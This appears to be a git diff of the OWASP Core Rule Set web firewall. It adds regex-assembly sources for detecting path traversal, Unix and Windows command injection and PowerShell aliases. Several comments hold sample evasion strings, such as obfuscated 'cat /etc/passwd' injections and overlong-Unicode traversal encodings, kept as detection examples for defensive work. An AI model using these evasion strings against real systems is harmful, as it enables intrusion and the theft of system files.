encoding ]] ------------------------------------------------ @@ -733,80 +740,12 @@ SecDefaultAction "phase:2,log,auditlog,pass" # Uncomment this rule to use this feature: # #SecAction \ -# "id:900950,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.crs_validate_utf8_encoding=1" - - -# -# -- [[ Blocking Based on IP Reputation ]] ------------------------------------ -# -# Blocking based on reputation is permanent in the CRS. Unlike other rules, -# which look at the individual request, the blocking of IPs is based on -# a persistent record in the IP collection, which remains active for a -# certain amount of time. -# -# There are two ways an individual client can become flagged for blocking: -# - External information (RBL, GeoIP, etc.) -# - Internal information (Core Rules) -# -# The record in the IP collection carries a flag, which tags requests from -# individual clients with a flag named IP.reput_block_flag. -# But the flag alone is not enough to have a client blocked. There is also -# a global switch named tx.do_reput_block. This is off by default. If you set -# it to 1 (=On), requests from clients with the IP.reput_block_flag will -# be blocked for a certain duration. -# -# Variables -# ip.reput_block_flag Blocking flag for the IP collection record -# ip.reput_block_reason Reason (= rule message) that caused to blocking flag -# tx.do_reput_block Switch deciding if we really block based on flag -# tx.reput_block_duration Setting to define the duration of a block -# -# It may be important to know, that all the other core rules are skipped for -# requests, when it is clear that they carry the blocking flag in question. -# -# Uncomment this rule to use this feature: -# -#SecAction \ -# "id:900960,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.do_reput_block=1" -# -# Uncomment this rule to change the blocking time: -# Default: 300 (5 minutes) -# -#SecAction \ -# "id:900970,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.reput_block_duration=300" - - -# -# -- [[ Collection timeout ]] -------------------------------------------------- -# -# Set the SecCollectionTimeout directive from the ModSecurity default (1 hour) -# to a lower setting which is appropriate to most sites. -# This increases performance by cleaning out stale collection (block) entries. -# -# This value should be greater than or equal to: -# tx.reput_block_duration (see section "Blocking Based on IP Reputation") and -# tx.dos_block_timeout (see section "Anti-Automation / DoS Protection"). -# -# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecCollectionTimeout - -# Please keep this directive uncommented. -# Default: 600 (10 minutes) -SecCollectionTimeout 600 +# "id:900950,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.crs_validate_utf8_encoding=1" # @@ -821,9 +760,9 @@ SecCollectionTimeout 600 # E.g., v3.0.0 is represented as 300. # SecAction \ - "id:900990,\ - phase:1,\ - nolog,\ - pass,\ - t:none,\ - setvar:tx.crs_setup_version=330" + "id:900990,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:tx.crs_setup_version=400" diff --git a/docs/OWASP-CRS-Documentation b/docs/OWASP-CRS-Documentation index df39d826fe..9038febc90 160000 --- a/docs/OWASP-CRS-Documentation +++ b/docs/OWASP-CRS-Documentation @@ -1 +1 @@ -Subproject commit df39d826fe43081c00499ba3094276c735d1883b +Subproject commit 9038febc90bac8a7d769194f0645a636ad64856b diff --git a/docs/README b/docs/README index 281651e7ee..aa961033fc 100644 --- a/docs/README +++ b/docs/README @@ -1,8 +1,17 @@ Welcome to the OWASP Core Rule Set (CRS) documentation. -The OWASP CRS documentation is generated as a Sphinx project and is stored in a separate Github repository. While the documentation is available as part of the CRS project it is provided in the form of a git-submodule. Using a git-submodule allow us to update the documentation without making changes to the main rule repository. + +The latest version of the documentation can be read at: +https://coreruleset.org/docs/ + +The OWASP CRS documentation is generated by Hugo and is stored +in a separate Github repository: +https://github.com/coreruleset/documentation/ + +While the documentation is available as part of the CRS project, +it is provided in the form of a Git submodule. Using a Git +submodule allows us to update the documentation without making +changes to the main rule repository. You can download the documentation using git: - $ git submodule init - $ git submodule update - -Alternatively, the latest version of the documentation is available at https://www.modsecurity.org/CRS/Documentation/ + + git submodule update --init docs diff --git a/plugins/README.md b/plugins/README.md new file mode 100644 index 0000000000..4c2cc9d4f4 --- /dev/null +++ b/plugins/README.md @@ -0,0 +1,7 @@ +This is the folder where you install CRS plugins. + +See https://github.com/coreruleset/plugin-registry +for a list of registered official and 3rd party plugins. + +Plugins are documented in the CRS INSTALL file and +in also with said plugin registry. diff --git a/plugins/empty-after.conf b/plugins/empty-after.conf new file mode 100644 index 0000000000..e69de29bb2 diff --git a/plugins/empty-before.conf b/plugins/empty-before.conf new file mode 100644 index 0000000000..e69de29bb2 diff --git a/plugins/empty-config.conf b/plugins/empty-config.conf new file mode 100644 index 0000000000..e69de29bb2 diff --git a/regex-assembly/920100.ra b/regex-assembly/920100.ra new file mode 100644 index 0000000000..aafa286883 --- /dev/null +++ b/regex-assembly/920100.ra @@ -0,0 +1,23 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Cover the GET method +##! | Path |--- Query ---| Fragment | +^get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?$ + +##! Cover the CONNECT method +##! Meth |----- IPv4 Address ------|- Port -| Protocol | +^connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?\s+[\w\./]+$ + +##! Meth |- Host --|Prt| Protocol | +^connect [\w\-\./]+:\d+\s+[\w\./]+$ + +##! Cover the OPTIONS method +##! Meth |*| Protocol | +^options \*\s+[\w\./]+$ + +##! Cover other methods of the form METHOD [[scheme]://[host][:port]]/path[?query][#fragment] protocol +##! Method ---|- Scheme:// -|- Host --|-- Port --| Path |--- Query ---| Fragment | Protocol | +^[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?\s+[\w\./]+$ diff --git a/regex-assembly/920120.ra b/regex-assembly/920120.ra new file mode 100644 index 0000000000..ef67c2e860 --- /dev/null +++ b/regex-assembly/920120.ra @@ -0,0 +1,27 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The HTML entities included in the expression are a best guess selection of frequently +##! used entities. Including too many would further reduce the performance of the expression +##! but there may well be additional entities that would make sense to add to the list. +##! The official list of entities is hosted by the WHATWG: +##! https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references + +##!+ i + +##!^ ^ +##!$ *$ + +&[aeiouclnrszg]acute; +&[cdelnrstz]caron; +&[cgklnrst]cedil; +&[aeioucghjswy]circ; +&[aeiou]grave; +&[au]ring; +&[anoi]tilde; +&[aeiouy]uml; +& +' +  +ø +[^'\";=] diff --git a/regex-assembly/920220-chain1.ra b/regex-assembly/920220-chain1.ra new file mode 100644 index 0000000000..b53f964c31 --- /dev/null +++ b/regex-assembly/920220-chain1.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + + +##!^ ^ +##!$ $ + +##! grab the path, except for the lat path segment (separate rule) +(.*)/ +##!=> +##! skip the last path segment, if there is one (non-capturing group) +(?:[^?]+)? +##!=> +##! grab the query string, if there is one +(\?.*)? diff --git a/regex-assembly/920221.ra b/regex-assembly/920221.ra new file mode 100644 index 0000000000..47184249d4 --- /dev/null +++ b/regex-assembly/920221.ra @@ -0,0 +1,12 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + + +##!^ ^ +##!$ $ + +##! find any percent character +.*%.* +##!=> +##! followed by something that looks like a file extension +\.[^\s.]+ diff --git a/regex-assembly/920260.ra b/regex-assembly/920260.ra new file mode 100644 index 0000000000..8bfd4a41cb --- /dev/null +++ b/regex-assembly/920260.ra @@ -0,0 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +%uff[0-9a-f]{2} diff --git a/regex-assembly/920521.ra b/regex-assembly/920521.ra new file mode 100644 index 0000000000..ac81329b1f --- /dev/null +++ b/regex-assembly/920521.ra @@ -0,0 +1,18 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Current Accept-Encoding headers +br +compress +deflate +gzip +identity +\* +^$ +##! Deprecated Accept-Encoding headers +aes128gcm +exi +pack200-gzip +zstd +x-compress +x-gzip diff --git a/regex-assembly/920600.ra b/regex-assembly/920600.ra new file mode 100644 index 0000000000..cdc7303ba4 --- /dev/null +++ b/regex-assembly/920600.ra @@ -0,0 +1,4 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!> include charset-specification diff --git a/regex-assembly/921421.ra b/regex-assembly/921421.ra new file mode 100644 index 0000000000..f796caecbd --- /dev/null +++ b/regex-assembly/921421.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200000 +##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/json" +##! Find Content-Type: application/soap+xml;boundary="application/json" +^[^;\s,]+[;\s,].*?application\/json + +##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200006 +##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/some.vendor+json" +##! Find Content-Type: application/soap+xml;boundary="application/some.vendor+json" +^[^;\s,]+[;\s,].*?application\/.+[+]json + +##! Attacks attempting bypass by forcing XML body processor leveraging recommended rule 200001 +##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/xml" +##! Find Content-Type: application/json;boundary="application/soap+xml" +^[^;\s,]+[;\s,].*?(?:application(?:\/soap\+|\/)|text\/)xml diff --git a/regex-assembly/921422.ra b/regex-assembly/921422.ra new file mode 100644 index 0000000000..5b70a56160 --- /dev/null +++ b/regex-assembly/921422.ra @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Attacks attempting to bypass content-type restrictions or behaviour +##! Find Content-Type: application/x-www-form-urlencoded;boundary="multipart/form-data" +##! Find Content-Type: application/soap-xml;boundary="multipart/form-data" +^[^;\s,]+[;\s,].*?\b(text|multipart|application)\b +^[^;\s,]+[;\s,].*?\b(audio|image|video|csv|css|vnd|pdf|plain|json|soap|xml|x-www-form-urlencoded|form-data|related|x-amf|octet|stream|csp|report)\b +^[^;\s,]+[;\s,].*?\b(\/|\+)\b diff --git a/regex-assembly/922110-chain1.ra b/regex-assembly/922110-chain1.ra new file mode 100644 index 0000000000..cdc7303ba4 --- /dev/null +++ b/regex-assembly/922110-chain1.ra @@ -0,0 +1,4 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!> include charset-specification diff --git a/regex-assembly/930100.ra b/regex-assembly/930100.ra new file mode 100644 index 0000000000..769c9faebf --- /dev/null +++ b/regex-assembly/930100.ra @@ -0,0 +1,110 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Source: https://github.com/wireghoul/dotdotpwn/blob/master/DotDotPwn/TraversalEngine.pm +##! Attack description: https://doc.lagout.org/security/McGraw.Hill.HackNotes.Web.Security.Portable.Reference.eBook-DDU.pdf +##! Excerpt: +##! In short, IIS turns %c0%af into +##! the ASCII / character, but parses it at a point where security checks for +##! ‘../’ traversals have already occurred! +##! What has really happened? The attack uses an overlong Unicode +##! representation for a forward or backward slash (/ or \). +##! Unicode permits multibyte encoding of the same character. +##! The fundamental representation can be referred to as a one (character) to one (byte field) +##! representation. The overlong representation is a one (character) to many +##! (bytes) version. +##! Two more valid strings that represent the backward slash are %c1%1c +##! and %c1%9c. The difference between these two hex values is 128. More +##! valid slash representations boil down to a matter of math. For example, +##! %c0%9v works even though %9v isn’t a hexadecimal value. Try adding +##! the value for “9” (57) to “v” (118); if the result is greater than 127, then +##! subtract 128—hint, the final result should be 47. + +##!+ i + +##! slash patterns +##!> assemble + \x5c + ##! URI encoded + %2f + %5c + ##! Hex encoded + 0x2f + 0x5c + ##! Double URI encoded + %252f + %255c + ##! Overlong Unicode sequences (target IIS) + %c0%2f + %c0%af + %c0%5c + %c1%9c + %c1%pc + %c0%9v + %c0%qf + %c1%8s + %c1%1c + %c1%af + %bg%qf + ##! Unicode 16 "alternative" glyphs + %u2215 + %u2216 + ##! Unknown + %uEFC8 + %uF025 + ##! More double encoding and variations on the above + %%32%%66 + %%35%%63 + %e0%80%af + %25c1%259c + %25c0%25af + %f0%80%80%af + %f8%80%80%80%af + %2%46 + %%32%46 + %%32F + %u002f + %1u + / + ##!=< slashes + ##!=> slashes + + ##! dot patterns + ##! These use the same techniques as for slashes to evade the detection of '.' + \. + \.%00 + \.%01 + \.\? + \?\. + \? + %2e + 0x2e + %c0\. + %252e + %c0%2e + %c0%ae + %c0%5e + %c0%ee + %c0%fe + %uff0e + %%32%%65 + %e0%80%ae + %25c0%25ae + %f0%80%80%ae + %f8%80%80%80%ae + %fc%80%80%80%80%ae + %2%45 + %u002e + %uff0e + %u2024 + %%32%45 + %%32E + %c0%6e + ##!=> + + ##! Append {2,3} to the result, as we're looking for two or three dots (e.g. /../, /.../) + {2,3} + ##!=> + + ##!=> slashes +##!< diff --git a/regex-assembly/931130.ra b/regex-assembly/931130.ra new file mode 100644 index 0000000000..558f5da468 --- /dev/null +++ b/regex-assembly/931130.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! ATTENTION: The rule files 931130.data and 931131.data are meant to be kept in sync. +##! They should result in the same regular expression used on different targets in different phases. + +##!+ i + +##!> assemble + ##!=> + (?:(?:url|jar):)? + ##!=> + ##!> include url-schemes + ##!=> + ://(?:[^@]+@)?([^/]*) + ##!=> +##!< diff --git a/regex-assembly/931131.ra b/regex-assembly/931131.ra new file mode 100644 index 0000000000..aef8b0ee84 --- /dev/null +++ b/regex-assembly/931131.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! ATTENTION: The rule files 931129.data and 931131.data are meant to be kept in sync. +##! They should result in the same regular expression used on different targets in different phases. + +##!+ i + +##!> assemble + ##!=> + (?:(?:url|jar):)? + ##!=> + ##!> include url-schemes + ##!=> + ://(?:[^@]+@)?([^/]*) + ##!=> +##!< diff --git a/regex-assembly/932125.ra b/regex-assembly/932125.ra new file mode 100644 index 0000000000..2a69987a10 --- /dev/null +++ b/regex-assembly/932125.ra @@ -0,0 +1,235 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932125 (RCE Windows command injection - PowerShell aliases) +##! +##! This list comes from the powershell source code. Can be updated using this oneliner: +##! curl -s https://raw.githubusercontent.com/PowerShell/PowerShell/master/src/System.Management.Automation/engine/InitialSessionState.cs -o - | awk -F\" '/new SessionStateAliasEntry\("/ { print $2; }' +##! To prevent some FP for a command, you can require command parameters +##! after a command. Only do this if the command regularly causes FP and if +##! allowing the bare command (without parameters) is not too dangerous. +##! (Note: due to \b following the regexp, a word boundary is also required +##! further on, so some letter/number is needed for a match). Example: +##! +##! diff@ + +##!+ i + +##! Note: the quoting prefixes are part of the command prefixes, except for ^ +##! which, for unknown reasons, is not part of the expression + +##! extension/switches suffix +##! cmd.com, cmd.exe, etc. +##!$ (?:\.[\"\^]*\w+)? +##! cmd/h +##!$ \b + +##! starting tokens prefix +##!> assemble + ##! ;cmd + ; + ##! {cmd + \{ + ##! |cmd + \| + ##! ||cmd + \|\| + ##! &cmd + & + ##! &&cmd + && + ##! \ncmd + \n + ##! \rcmd + \r + ##! `cmd + ` + ##!=> + + ##! match possible white space between prefix expressions + \s* + ##!=> + + ##! commands prefix + ##!> assemble + ##! (cmd) + \( + ##! ,cmd + , + ##! @cmd + @ + ##! 'cmd' + ' + ##! "cmd" + \" + ##! spacing+cmd + \s + ##!< + ##!=> + + * + ##!=> + + ##! paths prefix + ##!> assemble + ##! /path/cmd + [\w'\"\./]+/ + ##! C:\Program Files\cmd + [\x5c'\"\^]*\w[\x5c'\"\^]*:.*\x5c + ##! \\net\share\dir\cmd + [\^\.\w '\"/\x5c]*\x5c + ##!< + ##!=> + + ?[\"\^]* + ##!=> + + ##!> cmdline windows + + ac@ + asnp@ + cd@ + ##! disabled for FP: cat@ + chdir@ + clc@ + ##! disabled for FP: clear + clhy@ + cli@ + clp@ + cls + clv@ + cnsn + ##! disabled for FP: compare@ + ##! disabled for FP: copy@ + cp@ + cpi@ + cpp@ + cvpa@ + dbp@ + del@ + diff@ + dir@ + dnsn + ebp@ + epal@ + epcsv@ + epsn@ + ##! disabled for FP: erase@ + etsn@ + exsn@ + fc@ + fl@ + foreach@ + ft@ + fw@ + gal@ + gbp@ + gc@ + gci@ + gcm@ + gcs@ + gdr@ + gerr + ghy@ + gi@ + gjb@ + gl@ + gm@ + gmo@ + gp@ + gps@ + gpv + ##! disabled for FP: group + gsn@ + gsnp@ + gsv@ + gu@ + gv@ + gwmi@ + ##! disabled for FP: h + ##! disabled for FP: history + icm@ + iex@ + ihy@ + ii@ + ipal@ + ipcsv@ + ipmo@ + ipsn@ + irm@ + ise@ + iwmi@ + iwr@ + ##! disabled for FP: kill + ls + man@ + md@ + ##! disabled for FP: measure + mi@ + mount@ + ##! disabled for FP: move + mp@ + mv@ + nal@ + ndr@ + ni@ + nmo@ + npssc + nsn@ + nv@ + ogv@ + ##! disabled for FP: oh + popd@ + pushd@ + ##! disabled for FP: pwd + ##! disabled for FP: r + rbp@ + rcjb@ + rcsn + rd@ + rdr@ + ren@ + ri@ + rjb@ + rm@ + rmdir@ + rmo@ + rni@ + rnp@ + rp@ + rsn@ + rsnp@ + rujb + rv@ + rvpa@ + rwmi@ + sajb@ + sal@ + saps@ + sasv@ + sbp@ + sc@ + ##! disabled for FP: select + ##! disabled for FP: set + shcm + si@ + sl@ + ##! disabled for FP: sleep + sls@ + ##! disabled for FP: sort + sp@ + spjb@ + spps@ + spsv@ + ##! disabled for FP: start + sujb + sv@ + swmi@ + ##! disabled for FP: tee + trcm@ + ##! disabled for FP: type + ##! disabled for FP: where + wjb@ + ##! disabled for FP: write@ + ##!< +##!< diff --git a/regex-assembly/932130.ra b/regex-assembly/932130.ra new file mode 100644 index 0000000000..bd183fc2af --- /dev/null +++ b/regex-assembly/932130.ra @@ -0,0 +1,4 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!> include 932130 diff --git a/regex-assembly/932131.ra b/regex-assembly/932131.ra new file mode 100644 index 0000000000..d769518b1a --- /dev/null +++ b/regex-assembly/932131.ra @@ -0,0 +1,7 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Rule 932131 uses the same regular expression as 932130 on a +##! different target. + +##!> include 932130 diff --git a/util/regexp-assemble/regexp-932140.data b/regex-assembly/932140.ra similarity index 63% rename from util/regexp-assemble/regexp-932140.data rename to regex-assembly/932140.ra index 05980b6c0d..ddab7e068c 100644 --- a/util/regexp-assemble/regexp-932140.data +++ b/regex-assembly/932140.ra @@ -1,2 +1,5 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + \bfor(?:/[dflr].*)? %+[^ ]+ in\(.*\)\s?do \bif(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==)) diff --git a/regex-assembly/932175.ra b/regex-assembly/932175.ra new file mode 100644 index 0000000000..afb7620e74 --- /dev/null +++ b/regex-assembly/932175.ra @@ -0,0 +1,27 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Prevent command aliasing + +##! starting tokens prefix +##!> assemble + \b + ##!=> + ##!> cmdline unix + alias + ##!< + ##!=> + + ##! match white space between command and arguments + \b\s+ + ##!=> + + ##! match the alias name + ['"\w!%,@]+ + ##!=> + + ##! match equals something + =\S + ##!=> + +##!< diff --git a/regex-assembly/932200.ra b/regex-assembly/932200.ra new file mode 100644 index 0000000000..e2dcc4d84a --- /dev/null +++ b/regex-assembly/932200.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! - bar;cd+/etc;/bin$u/ca*+passwd +##! - foo;ca\t+/et\c/pa\s\swd +##! - foo;c'at'+/etc/pa's'swd +[*?`\x5c'][^/\n]+/ +/[^/]+?[*?`\x5c'] +##! - foo;cat$u+/etc$u/passwd +##! - foo;c$-at+/et$-c/pas$-swd +##! - foo;c$_at+/et$_c/pas$_swd +##! - foo;c$?at+/et$?c/pas$?swd +##! - foo;c$*at+/et$*c/pas$*swd +##! - foo;c$@at+/et$@c/pas$@swd +##! - foo;c$!at+/et$!c/pas$!swd +##! - foo;c$$at+/et$$c/pas$$swd +\$[({\[#@!?*\-_$a-zA-Z0-9] diff --git a/regex-assembly/932205.ra b/regex-assembly/932205.ra new file mode 100644 index 0000000000..84695af32d --- /dev/null +++ b/regex-assembly/932205.ra @@ -0,0 +1,29 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Prefix to prevent the first `?` (query string marker +##! in URLs) from matching any of the later expressions. +##! If the URL does not have a query string, then instead +##! look for the first `;`. +##! Prefix and suffix markers also form two capture groups +##! that are used for processing and logging in the rule. +##!^ ^[^.]+\.[^?;]+[?;](.*( +##!$ )) + +##! The following expressions in this file must be identical to the +##! ones in 932200. + +##! - bar;cd+/etc;/bin$u/ca*+passwd +##! - foo;ca\t+/et\c/pa\s\swd +##! - foo;c'at'+/etc/pa's'swd +[*?`\x5c'][^/\n]+/ +/[^/]+?[*?`\x5c'] +##! - foo;cat$u+/etc$u/passwd +##! - foo;c$-at+/et$-c/pas$-swd +##! - foo;c$_at+/et$_c/pas$_swd +##! - foo;c$?at+/et$?c/pas$?swd +##! - foo;c$*at+/et$*c/pas$*swd +##! - foo;c$@at+/et$@c/pas$@swd +##! - foo;c$!at+/et$!c/pas$!swd +##! - foo;c$$at+/et$$c/pas$$swd +\$[({\[#@!?*\-_$a-zA-Z0-9] diff --git a/regex-assembly/932206.ra b/regex-assembly/932206.ra new file mode 100644 index 0000000000..dce24e55f5 --- /dev/null +++ b/regex-assembly/932206.ra @@ -0,0 +1,25 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Prefix to ensure that the rule only matches when the +##! value of the Referer header is not a URL (illegal header +##! value). +##!^ ^[^.]*? + +##! The following expressions in this file must be identical to the +##! ones in 932200. + +##! - bar;cd+/etc;/bin$u/ca*+passwd +##! - foo;ca\t+/et\c/pa\s\swd +##! - foo;c'at'+/etc/pa's'swd +[*?`\x5c'][^/\n]+/ +/[^/]+?[*?`\x5c'] +##! - foo;cat$u+/etc$u/passwd +##! - foo;c$-at+/et$-c/pas$-swd +##! - foo;c$_at+/et$_c/pas$_swd +##! - foo;c$?at+/et$?c/pas$?swd +##! - foo;c$*at+/et$*c/pas$*swd +##! - foo;c$@at+/et$@c/pas$@swd +##! - foo;c$!at+/et$!c/pas$!swd +##! - foo;c$$at+/et$$c/pas$$swd +\$[({\[#@!?*\-_$a-zA-Z0-9] diff --git a/regex-assembly/932210.ra b/regex-assembly/932210.ra new file mode 100644 index 0000000000..1d44a18737 --- /dev/null +++ b/regex-assembly/932210.ra @@ -0,0 +1,77 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list can be updated using: +##! curl -ks https://raw.githubusercontent.com/sqlite/sqlite/master/src/shell.c.in | grep -oE '^\s+"(\.[a-z0-9]+)' | cut -f2 -d. + +##!^ ;\s*\.\s*[\"']? + +archive +auth +backup +bail +binary +cd +changes +check +clone +connection +databases +dbconfig +dbinfo +dump +echo +eqp +excel +exit +expert +explain +filectrl +fullschema +headers +help +import +imposter +indexes +iotrace +limit +lint +load +log +mode +nonce +nullvalue +once +open +output +parameter +print +progress +prompt +quit +read +recover +restore +save +scanstats +schema +selftest +separator +session +sh +sha3sum +shell +show +stats +system +tables +testcase +testctrl +timeout +timer +trace +unmodule +vfsinfo +vfslist +vfsname +width diff --git a/regex-assembly/932220.ra b/regex-assembly/932220.ra new file mode 100644 index 0000000000..c2bc6307c5 --- /dev/null +++ b/regex-assembly/932220.ra @@ -0,0 +1,25 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932220 (RCE Unix command injection) +##! +##! This list comes from (and should be in sync) the `unix-shell.data` file. + +##! Not all of the prefixes for the command words will be legal. +##! We've decided to use the same prefix as in 932100 and 932105 here, +##! because we don't know exactly what things are possible after a pipe and +##! we don't want to overcomplicate things by introducing another prefix variation. +##! Not all of the prefixes matched by the expression will actually be valid. + +##!+ i + +##!^ .\| + +##!> assemble + \s* + ##!> include unix-shell-evasion-prefix + + ##!> cmdline unix + ##!> include-except unix-shell-upto3 unix-shell-fps-pl2 -- @ "" ~ "" + ##!< +##!< diff --git a/regex-assembly/932230.ra b/regex-assembly/932230.ra new file mode 100644 index 0000000000..7b298ea668 --- /dev/null +++ b/regex-assembly/932230.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932230 (RCE for commands of two and three character words) +##! +##! Per discussion in https://github.com/coreruleset/coreruleset/issues/2632, we decided +##! to extend the cmdline evasion regex, so we are applying the evasion to a subset of the +##! original 93210(0|5) rules: the subset of commands from two or three characters that might pose +##! a greater risk of false positives. + +##!+ i + +##!$ \b + +##!> assemble + ##!> include unix-shell-evasion-prefix + + ##!> cmdline unix + ##!> include-except unix-shell-upto3 unix-shell-fps-pl1 + ##!< +##!< diff --git a/regex-assembly/932231.ra b/regex-assembly/932231.ra new file mode 100644 index 0000000000..22b5e8b890 --- /dev/null +++ b/regex-assembly/932231.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932231 (RCE Unix command injection part 3/4) +##! +##! To prevent some FP for a command, you can require command parameters +##! after a command. Only do this if the command regularly causes FP and if +##! allowing the bare command (without parameters) is not too dangerous. +##! (Note: due to \b following the regexp, a word boundary is also required +##! further on, so some letter/number is needed for a match). Example: +##! +##! diff+ + +##! Special regexp case for the '.' (source) command to prevent FP: + + +##!> assemble + ##!> include unix-shell-evasion-prefix + + \.\s.*\b +##!< diff --git a/regex-assembly/932232.ra b/regex-assembly/932232.ra new file mode 100644 index 0000000000..50af9d0131 --- /dev/null +++ b/regex-assembly/932232.ra @@ -0,0 +1,16 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932232 (RCE Unix command injection part 4/4) + +##!$ \b + +##!> assemble + ##!> include unix-shell-evasion-prefix + + ##!> assemble + ##!> cmdline unix + ##!> include unix-shell-pl3 + ##!< + ##!< +##!< diff --git a/regex-assembly/932235.ra b/regex-assembly/932235.ra new file mode 100644 index 0000000000..df2b696e3b --- /dev/null +++ b/regex-assembly/932235.ra @@ -0,0 +1,11 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> include unix-shell-evasion-prefix + +##! These patterns are approximations of the patterns used by the cmdline +##! processor for `@` and `~`. +##! These patterns are used across multiple files, change with care. +##!> include-except unix-shell-4andup unix-shell-fps-pl1-curated -- @ [\s<>&|)] ~ \S diff --git a/regex-assembly/932236.ra b/regex-assembly/932236.ra new file mode 100644 index 0000000000..205a7cdb29 --- /dev/null +++ b/regex-assembly/932236.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string.ra +##!< +##!=> + +##! These patterns are approximations of the patterns used by the cmdline +##! processor for `@` and `~`. +##! These patterns are used across multiple files, change with care. +##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ [\s<>&|)] ~ \S +##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ [\s<>&|)] ~ \S diff --git a/regex-assembly/932237.ra b/regex-assembly/932237.ra new file mode 100644 index 0000000000..db57f72d9d --- /dev/null +++ b/regex-assembly/932237.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!^ \b + +##!$ (?:\b|\W) + +##! These patterns are approximations of the patterns used by the cmdline +##! processor for `@` and `~`. +##! These patterns are used across multiple files, change with care. +##!> include-except unix-shell-upto3 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S +##!> include-except unix-shell-4andup unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S +##!> include-except unix-shell-pl3 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S diff --git a/regex-assembly/932238.ra b/regex-assembly/932238.ra new file mode 100644 index 0000000000..a11509f5a9 --- /dev/null +++ b/regex-assembly/932238.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string +##!< +##!=> + +##!> assemble + ##!> cmdline unix + ##!> include unix-shell-pl3 + ##!< +##!< diff --git a/regex-assembly/932239.ra b/regex-assembly/932239.ra new file mode 100644 index 0000000000..a37b41ea2a --- /dev/null +++ b/regex-assembly/932239.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string +##!< +##!=> + +##! These patterns are approximations of the patterns used by the cmdline +##! processor for `@` and `~`. +##! These patterns are used across multiple files, change with care. +##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ 